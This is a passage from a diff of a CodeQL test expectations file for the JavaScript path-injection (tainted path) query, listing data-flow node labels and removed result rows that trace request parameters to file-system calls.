ry.path | +| other-fs-libraries.js:38:24:38:30 | req.url | semmle.label | req.url | +| other-fs-libraries.js:40:35:40:38 | path | semmle.label | path | +| other-fs-libraries.js:41:50:41:53 | path | semmle.label | path | +| other-fs-libraries.js:42:53:42:56 | path | semmle.label | path | +| other-fs-libraries.js:49:7:49:48 | path | semmle.label | path | +| other-fs-libraries.js:49:14:49:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| other-fs-libraries.js:49:14:49:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| other-fs-libraries.js:49:14:49:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| other-fs-libraries.js:49:24:49:30 | req.url | semmle.label | req.url | +| other-fs-libraries.js:51:19:51:22 | path | semmle.label | path | +| other-fs-libraries.js:52:24:52:27 | path | semmle.label | path | +| other-fs-libraries.js:54:36:54:39 | path | semmle.label | path | +| other-fs-libraries.js:55:36:55:39 | path | semmle.label | path | +| other-fs-libraries.js:57:46:57:49 | path | semmle.label | path | +| other-fs-libraries.js:59:39:59:42 | path | semmle.label | path | +| other-fs-libraries.js:62:43:62:46 | path | semmle.label | path | +| other-fs-libraries.js:63:51:63:54 | path | semmle.label | path | +| other-fs-libraries.js:68:7:68:48 | path | semmle.label | path | +| other-fs-libraries.js:68:14:68:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| other-fs-libraries.js:68:14:68:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| other-fs-libraries.js:68:14:68:48 | url.par ... ry.path | semmle.label | url.par ... 
ry.path | +| other-fs-libraries.js:68:24:68:30 | req.url | semmle.label | req.url | +| other-fs-libraries.js:70:19:70:22 | path | semmle.label | path | +| other-fs-libraries.js:71:10:71:13 | path | semmle.label | path | +| other-fs-libraries.js:72:15:72:18 | path | semmle.label | path | +| other-fs-libraries.js:73:8:73:11 | path | semmle.label | path | +| other-fs-libraries.js:75:15:75:15 | x | semmle.label | x | +| other-fs-libraries.js:76:19:76:19 | x | semmle.label | x | +| other-fs-libraries.js:81:7:81:48 | path | semmle.label | path | +| other-fs-libraries.js:81:14:81:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| other-fs-libraries.js:81:14:81:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| other-fs-libraries.js:81:14:81:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| other-fs-libraries.js:81:24:81:30 | req.url | semmle.label | req.url | +| other-fs-libraries.js:83:16:83:19 | path | semmle.label | path | +| prettier.js:6:11:6:28 | p | semmle.label | p | +| prettier.js:6:13:6:13 | p | semmle.label | p | +| prettier.js:7:28:7:28 | p | semmle.label | p | +| prettier.js:11:44:11:44 | p | semmle.label | p | +| pupeteer.js:5:9:5:71 | tainted | semmle.label | tainted | +| pupeteer.js:5:19:5:71 | "dir/" ... t.data" | semmle.label | "dir/" ... t.data" | +| pupeteer.js:5:28:5:53 | parseTo ... t).name | semmle.label | parseTo ... t).name | +| pupeteer.js:9:28:9:34 | tainted | semmle.label | tainted | +| pupeteer.js:13:37:13:43 | tainted | semmle.label | tainted | +| sharedlib-repro.js:13:22:13:43 | req.par ... spaceId | semmle.label | req.par ... spaceId | +| sharedlib-repro.js:21:27:21:34 | filepath | semmle.label | filepath | +| sharedlib-repro.js:22:18:22:25 | filepath | semmle.label | filepath | +| tainted-access-paths.js:6:7:6:48 | path | semmle.label | path | +| tainted-access-paths.js:6:14:6:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| tainted-access-paths.js:6:14:6:43 | url.par ... 
).query | semmle.label | url.par ... ).query | +| tainted-access-paths.js:6:14:6:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| tainted-access-paths.js:6:24:6:30 | req.url | semmle.label | req.url | +| tainted-access-paths.js:8:19:8:22 | path | semmle.label | path | +| tainted-access-paths.js:10:7:10:36 | obj | semmle.label | obj | +| tainted-access-paths.js:10:33:10:36 | path | semmle.label | path | +| tainted-access-paths.js:12:19:12:21 | obj | semmle.label | obj | +| tainted-access-paths.js:12:19:12:25 | obj.sub | semmle.label | obj.sub | +| tainted-access-paths.js:26:19:26:21 | obj | semmle.label | obj | +| tainted-access-paths.js:26:19:26:26 | obj.sub3 | semmle.label | obj.sub3 | +| tainted-access-paths.js:29:21:29:23 | obj | semmle.label | obj | +| tainted-access-paths.js:29:21:29:28 | obj.sub4 | semmle.label | obj.sub4 | +| tainted-access-paths.js:30:23:30:25 | obj | semmle.label | obj | +| tainted-access-paths.js:30:23:30:30 | obj.sub4 | semmle.label | obj.sub4 | +| tainted-access-paths.js:31:23:31:25 | obj | semmle.label | obj | +| tainted-access-paths.js:31:23:31:30 | obj.sub4 | semmle.label | obj.sub4 | +| tainted-access-paths.js:39:7:39:48 | path | semmle.label | path | +| tainted-access-paths.js:39:14:39:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| tainted-access-paths.js:39:14:39:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| tainted-access-paths.js:39:14:39:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| tainted-access-paths.js:39:24:39:30 | req.url | semmle.label | req.url | +| tainted-access-paths.js:40:23:40:26 | path | semmle.label | path | +| tainted-access-paths.js:48:7:48:48 | path | semmle.label | path | +| tainted-access-paths.js:48:14:48:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| tainted-access-paths.js:48:14:48:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| tainted-access-paths.js:48:14:48:48 | url.par ... 
ry.path | semmle.label | url.par ... ry.path | +| tainted-access-paths.js:48:24:48:30 | req.url | semmle.label | req.url | +| tainted-access-paths.js:49:10:49:13 | path | semmle.label | path | +| tainted-promise-steps.js:6:7:6:48 | path | semmle.label | path | +| tainted-promise-steps.js:6:14:6:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| tainted-promise-steps.js:6:14:6:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| tainted-promise-steps.js:6:14:6:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| tainted-promise-steps.js:6:24:6:30 | req.url | semmle.label | req.url | +| tainted-promise-steps.js:7:10:7:30 | Promise ... e(path) [PromiseValue] | semmle.label | Promise ... e(path) [PromiseValue] | +| tainted-promise-steps.js:7:26:7:29 | path | semmle.label | path | +| tainted-promise-steps.js:10:23:10:33 | pathPromise [PromiseValue] | semmle.label | pathPromise [PromiseValue] | +| tainted-promise-steps.js:11:19:11:35 | await pathPromise | semmle.label | await pathPromise | +| tainted-promise-steps.js:11:25:11:35 | pathPromise [PromiseValue] | semmle.label | pathPromise [PromiseValue] | +| tainted-promise-steps.js:12:3:12:13 | pathPromise [PromiseValue] | semmle.label | pathPromise [PromiseValue] | +| tainted-promise-steps.js:12:20:12:23 | path | semmle.label | path | +| tainted-promise-steps.js:12:44:12:47 | path | semmle.label | path | +| tainted-require.js:6:19:6:37 | req.param("module") | semmle.label | req.param("module") | +| tainted-require.js:11:29:11:47 | req.param("module") | semmle.label | req.param("module") | +| tainted-require.js:13:11:13:29 | req.param("module") | semmle.label | req.param("module") | +| tainted-sendFile.js:7:16:7:33 | req.param("gimme") | semmle.label | req.param("gimme") | +| tainted-sendFile.js:8:16:8:33 | req.param("gimme") | semmle.label | req.param("gimme") | +| tainted-sendFile.js:15:43:15:58 | req.param("dir") | semmle.label | req.param("dir") | +| 
tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | semmle.label | path.re ... rams.x) | +| tainted-sendFile.js:21:37:21:48 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | +| tainted-sendFile.js:22:34:22:45 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:26:16:26:33 | req.param("gimme") | semmle.label | req.param("gimme") | +| tainted-sendFile.js:28:16:28:48 | homeDir ... arams.x | semmle.label | homeDir ... arams.x | +| tainted-sendFile.js:28:37:28:48 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:30:16:30:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | +| tainted-sendFile.js:30:34:30:45 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:32:43:32:58 | req.param("dir") | semmle.label | req.param("dir") | +| tainted-string-steps.js:6:7:6:48 | path | semmle.label | path | +| tainted-string-steps.js:6:14:6:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| tainted-string-steps.js:6:14:6:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| tainted-string-steps.js:6:14:6:48 | url.par ... ry.path | semmle.label | url.par ... 
ry.path | +| tainted-string-steps.js:6:24:6:30 | req.url | semmle.label | req.url | +| tainted-string-steps.js:8:18:8:21 | path | semmle.label | path | +| tainted-string-steps.js:8:18:8:34 | path.substring(4) | semmle.label | path.substring(4) | +| tainted-string-steps.js:9:18:9:21 | path | semmle.label | path | +| tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | semmle.label | path.substring(0, i) | +| tainted-string-steps.js:10:18:10:21 | path | semmle.label | path | +| tainted-string-steps.js:10:18:10:31 | path.substr(4) | semmle.label | path.substr(4) | +| tainted-string-steps.js:11:18:11:21 | path | semmle.label | path | +| tainted-string-steps.js:11:18:11:30 | path.slice(4) | semmle.label | path.slice(4) | +| tainted-string-steps.js:13:18:13:21 | path | semmle.label | path | +| tainted-string-steps.js:13:18:13:37 | path.concat(unknown) | semmle.label | path.concat(unknown) | +| tainted-string-steps.js:14:18:14:37 | unknown.concat(path) | semmle.label | unknown.concat(path) | +| tainted-string-steps.js:14:33:14:36 | path | semmle.label | path | +| tainted-string-steps.js:15:18:15:46 | unknown ... , path) | semmle.label | unknown ... 
, path) | +| tainted-string-steps.js:15:42:15:45 | path | semmle.label | path | +| tainted-string-steps.js:17:18:17:21 | path | semmle.label | path | +| tainted-string-steps.js:17:18:17:28 | path.trim() | semmle.label | path.trim() | +| tainted-string-steps.js:18:18:18:21 | path | semmle.label | path | +| tainted-string-steps.js:18:18:18:35 | path.toLowerCase() | semmle.label | path.toLowerCase() | +| tainted-string-steps.js:22:18:22:21 | path | semmle.label | path | +| tainted-string-steps.js:22:18:22:32 | path.split('/') | semmle.label | path.split('/') | +| tainted-string-steps.js:22:18:22:35 | path.split('/')[i] | semmle.label | path.split('/')[i] | +| tainted-string-steps.js:23:18:23:21 | path | semmle.label | path | +| tainted-string-steps.js:23:18:23:33 | path.split(/\\//) | semmle.label | path.split(/\\//) | +| tainted-string-steps.js:23:18:23:36 | path.split(/\\//)[i] | semmle.label | path.split(/\\//)[i] | +| tainted-string-steps.js:24:18:24:21 | path | semmle.label | path | +| tainted-string-steps.js:24:18:24:32 | path.split("?") | semmle.label | path.split("?") | +| tainted-string-steps.js:24:18:24:35 | path.split("?")[0] | semmle.label | path.split("?")[0] | +| tainted-string-steps.js:26:18:26:21 | path | semmle.label | path | +| tainted-string-steps.js:26:18:26:36 | path.split(unknown) | semmle.label | path.split(unknown) | +| tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | semmle.label | path.sp ... hatever | +| tainted-string-steps.js:27:18:27:21 | path | semmle.label | path | +| tainted-string-steps.js:27:18:27:36 | path.split(unknown) | semmle.label | path.split(unknown) | +| torrents.js:5:6:5:38 | name | semmle.label | name | +| torrents.js:5:13:5:38 | parseTo ... t).name | semmle.label | parseTo ... t).name | +| torrents.js:6:6:6:45 | loc | semmle.label | loc | +| torrents.js:6:12:6:45 | dir + " ... t.data" | semmle.label | dir + " ... 
t.data" | +| torrents.js:6:24:6:27 | name | semmle.label | name | +| torrents.js:7:25:7:27 | loc | semmle.label | loc | +| typescript.ts:9:7:9:48 | path | semmle.label | path | +| typescript.ts:9:14:9:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| typescript.ts:9:14:9:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| typescript.ts:9:14:9:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| typescript.ts:9:24:9:30 | req.url | semmle.label | req.url | +| typescript.ts:11:29:11:32 | path | semmle.label | path | +| typescript.ts:19:7:19:18 | path3 | semmle.label | path3 | +| typescript.ts:19:15:19:18 | path | semmle.label | path | +| typescript.ts:20:39:20:43 | path3 | semmle.label | path3 | +| typescript.ts:22:7:22:18 | path4 | semmle.label | path4 | +| typescript.ts:22:15:22:18 | path | semmle.label | path | +| typescript.ts:23:39:23:43 | path4 | semmle.label | path4 | +| typescript.ts:29:7:29:18 | path6 | semmle.label | path6 | +| typescript.ts:29:15:29:18 | path | semmle.label | path | +| typescript.ts:31:29:31:33 | path6 | semmle.label | path6 | +| views.js:1:43:1:55 | req.params[0] | semmle.label | req.params[0] | subpaths -#select -| TaintedPath-es6.js:10:26:10:45 | join("public", path) | TaintedPath-es6.js:7:20:7:26 | req.url | TaintedPath-es6.js:10:26:10:45 | join("public", path) | This path depends on a $@. | TaintedPath-es6.js:7:20:7:26 | req.url | user-provided value | -| TaintedPath.js:12:29:12:32 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:12:29:12:32 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:15:29:15:48 | "/home/user/" + path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:15:29:15:48 | "/home/user/" + path | This path depends on a $@. 
| TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:18:33:18:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:18:33:18:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:21:33:21:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:21:33:21:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:24:33:24:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:24:33:24:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:33:31:33:34 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:33:31:33:34 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:42:29:42:52 | pathMod ... e(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:42:29:42:52 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:46:29:46:49 | pathMod ... n(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:46:29:46:49 | pathMod ... n(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:50:29:50:54 | pathMod ... e(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:50:29:50:54 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:52:29:52:56 | pathMod ... , path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:52:29:52:56 | pathMod ... , path) | This path depends on a $@. 
| TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:56:29:56:52 | pathMod ... e(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:56:29:56:52 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:60:29:60:61 | pathMod ... h(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:60:29:60:61 | pathMod ... h(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:65:31:65:76 | require ... ).query | TaintedPath.js:65:63:65:69 | req.url | TaintedPath.js:65:31:65:76 | require ... ).query | This path depends on a $@. | TaintedPath.js:65:63:65:69 | req.url | user-provided value | -| TaintedPath.js:66:31:66:74 | require ... ).query | TaintedPath.js:66:61:66:67 | req.url | TaintedPath.js:66:31:66:74 | require ... ).query | This path depends on a $@. | TaintedPath.js:66:61:66:67 | req.url | user-provided value | -| TaintedPath.js:67:31:67:73 | require ... ).query | TaintedPath.js:67:60:67:66 | req.url | TaintedPath.js:67:31:67:73 | require ... ).query | This path depends on a $@. | TaintedPath.js:67:60:67:66 | req.url | user-provided value | -| TaintedPath.js:75:48:75:60 | req.params[0] | TaintedPath.js:75:48:75:60 | req.params[0] | TaintedPath.js:75:48:75:60 | req.params[0] | This path depends on a $@. | TaintedPath.js:75:48:75:60 | req.params[0] | user-provided value | -| TaintedPath.js:86:28:86:48 | fs.real ... 
c(path) | TaintedPath.js:84:23:84:29 | req.url | TaintedPath.js:86:28:86:48 | fs.real ... c(path) | This path depends on a $@. | TaintedPath.js:84:23:84:29 | req.url | user-provided value | -| TaintedPath.js:89:45:89:52 | realpath | TaintedPath.js:84:23:84:29 | req.url | TaintedPath.js:89:45:89:52 | realpath | This path depends on a $@. | TaintedPath.js:84:23:84:29 | req.url | user-provided value | -| TaintedPath.js:122:23:122:26 | path | TaintedPath.js:120:23:120:29 | req.url | TaintedPath.js:122:23:122:26 | path | This path depends on a $@. | TaintedPath.js:120:23:120:29 | req.url | user-provided value | -| TaintedPath.js:128:19:128:22 | path | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:128:19:128:22 | path | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:132:19:132:33 | split.join("/") | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:132:19:132:33 | split.join("/") | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:136:19:136:26 | split[x] | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:136:19:136:26 | split[x] | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:137:19:137:35 | prefix + split[x] | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:137:19:137:35 | prefix + split[x] | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:140:19:140:37 | concatted.join("/") | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:140:19:140:37 | concatted.join("/") | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:143:19:143:38 | concatted2.join("/") | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:143:19:143:38 | concatted2.join("/") | This path depends on a $@. 
| TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:145:19:145:29 | split.pop() | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:145:19:145:29 | split.pop() | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:154:29:154:55 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:154:29:154:55 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:160:29:160:52 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:160:29:160:52 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:161:29:161:53 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:161:29:161:53 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:162:29:162:51 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:162:29:162:51 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:163:29:163:57 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:163:29:163:57 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:178:29:178:73 | "prefix ... +/, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:178:29:178:73 | "prefix ... +/, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:179:29:179:84 | pathMod ... +/, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:179:29:179:84 | pathMod ... +/, '') | This path depends on a $@. 
| TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:187:29:187:49 | qs.pars ... rl).foo | TaintedPath.js:187:38:187:44 | req.url | TaintedPath.js:187:29:187:49 | qs.pars ... rl).foo | This path depends on a $@. | TaintedPath.js:187:38:187:44 | req.url | user-provided value | -| TaintedPath.js:188:29:188:63 | qs.pars ... l)).foo | TaintedPath.js:188:51:188:57 | req.url | TaintedPath.js:188:29:188:63 | qs.pars ... l)).foo | This path depends on a $@. | TaintedPath.js:188:51:188:57 | req.url | user-provided value | -| TaintedPath.js:190:29:190:55 | parseqs ... rl).foo | TaintedPath.js:190:44:190:50 | req.url | TaintedPath.js:190:29:190:55 | parseqs ... rl).foo | This path depends on a $@. | TaintedPath.js:190:44:190:50 | req.url | user-provided value | -| TaintedPath.js:196:31:196:34 | path | TaintedPath.js:195:24:195:30 | req.url | TaintedPath.js:196:31:196:34 | path | This path depends on a $@. | TaintedPath.js:195:24:195:30 | req.url | user-provided value | -| TaintedPath.js:197:45:197:48 | path | TaintedPath.js:195:24:195:30 | req.url | TaintedPath.js:197:45:197:48 | path | This path depends on a $@. | TaintedPath.js:195:24:195:30 | req.url | user-provided value | -| TaintedPath.js:198:35:198:38 | path | TaintedPath.js:195:24:195:30 | req.url | TaintedPath.js:198:35:198:38 | path | This path depends on a $@. | TaintedPath.js:195:24:195:30 | req.url | user-provided value | -| TaintedPath.js:206:29:206:85 | path.re ... '), '') | TaintedPath.js:202:24:202:30 | req.url | TaintedPath.js:206:29:206:85 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:202:24:202:30 | req.url | user-provided value | -| TaintedPath.js:213:29:213:68 | path.re ... '), '') | TaintedPath.js:211:24:211:30 | req.url | TaintedPath.js:213:29:213:68 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:211:24:211:30 | req.url | user-provided value | -| TaintedPath.js:216:31:216:69 | path.re ... 
'), '') | TaintedPath.js:211:24:211:30 | req.url | TaintedPath.js:216:31:216:69 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:211:24:211:30 | req.url | user-provided value | -| examples/TaintedPath.js:11:29:11:43 | ROOT + filePath | examples/TaintedPath.js:8:28:8:34 | req.url | examples/TaintedPath.js:11:29:11:43 | ROOT + filePath | This path depends on a $@. | examples/TaintedPath.js:8:28:8:34 | req.url | user-provided value | -| express.js:8:20:8:32 | req.query.bar | express.js:8:20:8:32 | req.query.bar | express.js:8:20:8:32 | req.query.bar | This path depends on a $@. | express.js:8:20:8:32 | req.query.bar | user-provided value | -| handlebars.js:11:32:11:39 | filePath | handlebars.js:29:46:29:60 | req.params.path | handlebars.js:11:32:11:39 | filePath | This path depends on a $@. | handlebars.js:29:46:29:60 | req.params.path | user-provided value | -| handlebars.js:15:25:15:32 | filePath | handlebars.js:43:15:43:29 | req.params.path | handlebars.js:15:25:15:32 | filePath | This path depends on a $@. | handlebars.js:43:15:43:29 | req.params.path | user-provided value | -| normalizedPaths.js:13:19:13:22 | path | normalizedPaths.js:11:14:11:27 | req.query.path | normalizedPaths.js:13:19:13:22 | path | This path depends on a $@. | normalizedPaths.js:11:14:11:27 | req.query.path | user-provided value | -| normalizedPaths.js:14:19:14:29 | './' + path | normalizedPaths.js:11:14:11:27 | req.query.path | normalizedPaths.js:14:19:14:29 | './' + path | This path depends on a $@. | normalizedPaths.js:11:14:11:27 | req.query.path | user-provided value | -| normalizedPaths.js:15:19:15:38 | path + '/index.html' | normalizedPaths.js:11:14:11:27 | req.query.path | normalizedPaths.js:15:19:15:38 | path + '/index.html' | This path depends on a $@. | normalizedPaths.js:11:14:11:27 | req.query.path | user-provided value | -| normalizedPaths.js:16:19:16:53 | pathMod ... 
.html') | normalizedPaths.js:11:14:11:27 | req.query.path | normalizedPaths.js:16:19:16:53 | pathMod ... .html') | This path depends on a $@. | normalizedPaths.js:11:14:11:27 | req.query.path | user-provided value | -| normalizedPaths.js:17:19:17:57 | pathMod ... , path) | normalizedPaths.js:11:14:11:27 | req.query.path | normalizedPaths.js:17:19:17:57 | pathMod ... , path) | This path depends on a $@. | normalizedPaths.js:11:14:11:27 | req.query.path | user-provided value | -| normalizedPaths.js:23:19:23:22 | path | normalizedPaths.js:21:35:21:48 | req.query.path | normalizedPaths.js:23:19:23:22 | path | This path depends on a $@. | normalizedPaths.js:21:35:21:48 | req.query.path | user-provided value | -| normalizedPaths.js:24:19:24:29 | './' + path | normalizedPaths.js:21:35:21:48 | req.query.path | normalizedPaths.js:24:19:24:29 | './' + path | This path depends on a $@. | normalizedPaths.js:21:35:21:48 | req.query.path | user-provided value | -| normalizedPaths.js:25:19:25:38 | path + '/index.html' | normalizedPaths.js:21:35:21:48 | req.query.path | normalizedPaths.js:25:19:25:38 | path + '/index.html' | This path depends on a $@. | normalizedPaths.js:21:35:21:48 | req.query.path | user-provided value | -| normalizedPaths.js:26:19:26:53 | pathMod ... .html') | normalizedPaths.js:21:35:21:48 | req.query.path | normalizedPaths.js:26:19:26:53 | pathMod ... .html') | This path depends on a $@. | normalizedPaths.js:21:35:21:48 | req.query.path | user-provided value | -| normalizedPaths.js:27:19:27:57 | pathMod ... , path) | normalizedPaths.js:21:35:21:48 | req.query.path | normalizedPaths.js:27:19:27:57 | pathMod ... , path) | This path depends on a $@. | normalizedPaths.js:21:35:21:48 | req.query.path | user-provided value | -| normalizedPaths.js:36:19:36:22 | path | normalizedPaths.js:31:35:31:48 | req.query.path | normalizedPaths.js:36:19:36:22 | path | This path depends on a $@. 
| normalizedPaths.js:31:35:31:48 | req.query.path | user-provided value | -| normalizedPaths.js:41:21:41:24 | path | normalizedPaths.js:31:35:31:48 | req.query.path | normalizedPaths.js:41:21:41:24 | path | This path depends on a $@. | normalizedPaths.js:31:35:31:48 | req.query.path | user-provided value | -| normalizedPaths.js:59:19:59:22 | path | normalizedPaths.js:54:35:54:48 | req.query.path | normalizedPaths.js:59:19:59:22 | path | This path depends on a $@. | normalizedPaths.js:54:35:54:48 | req.query.path | user-provided value | -| normalizedPaths.js:63:19:63:38 | path + "/index.html" | normalizedPaths.js:54:35:54:48 | req.query.path | normalizedPaths.js:63:19:63:38 | path + "/index.html" | This path depends on a $@. | normalizedPaths.js:54:35:54:48 | req.query.path | user-provided value | -| normalizedPaths.js:68:21:68:24 | path | normalizedPaths.js:54:35:54:48 | req.query.path | normalizedPaths.js:68:21:68:24 | path | This path depends on a $@. | normalizedPaths.js:54:35:54:48 | req.query.path | user-provided value | -| normalizedPaths.js:78:22:78:25 | path | normalizedPaths.js:73:42:73:55 | req.query.path | normalizedPaths.js:78:22:78:25 | path | This path depends on a $@. | normalizedPaths.js:73:42:73:55 | req.query.path | user-provided value | -| normalizedPaths.js:87:29:87:32 | path | normalizedPaths.js:82:14:82:27 | req.query.path | normalizedPaths.js:87:29:87:32 | path | This path depends on a $@. | normalizedPaths.js:82:14:82:27 | req.query.path | user-provided value | -| normalizedPaths.js:90:31:90:34 | path | normalizedPaths.js:82:14:82:27 | req.query.path | normalizedPaths.js:90:31:90:34 | path | This path depends on a $@. | normalizedPaths.js:82:14:82:27 | req.query.path | user-provided value | -| normalizedPaths.js:99:29:99:32 | path | normalizedPaths.js:94:35:94:48 | req.query.path | normalizedPaths.js:99:29:99:32 | path | This path depends on a $@. 
| normalizedPaths.js:94:35:94:48 | req.query.path | user-provided value | -| normalizedPaths.js:119:19:119:22 | path | normalizedPaths.js:117:30:117:43 | req.query.path | normalizedPaths.js:119:19:119:22 | path | This path depends on a $@. | normalizedPaths.js:117:30:117:43 | req.query.path | user-provided value | -| normalizedPaths.js:120:19:120:53 | pathMod ... .html') | normalizedPaths.js:117:30:117:43 | req.query.path | normalizedPaths.js:120:19:120:53 | pathMod ... .html') | This path depends on a $@. | normalizedPaths.js:117:30:117:43 | req.query.path | user-provided value | -| normalizedPaths.js:135:21:135:24 | path | normalizedPaths.js:130:35:130:48 | req.query.path | normalizedPaths.js:135:21:135:24 | path | This path depends on a $@. | normalizedPaths.js:130:35:130:48 | req.query.path | user-provided value | -| normalizedPaths.js:144:21:144:24 | path | normalizedPaths.js:139:48:139:61 | req.query.path | normalizedPaths.js:144:21:144:24 | path | This path depends on a $@. | normalizedPaths.js:139:48:139:61 | req.query.path | user-provided value | -| normalizedPaths.js:151:21:151:24 | path | normalizedPaths.js:148:44:148:57 | req.query.path | normalizedPaths.js:151:21:151:24 | path | This path depends on a $@. | normalizedPaths.js:148:44:148:57 | req.query.path | user-provided value | -| normalizedPaths.js:153:21:153:24 | path | normalizedPaths.js:148:44:148:57 | req.query.path | normalizedPaths.js:153:21:153:24 | path | This path depends on a $@. | normalizedPaths.js:148:44:148:57 | req.query.path | user-provided value | -| normalizedPaths.js:165:19:165:22 | path | 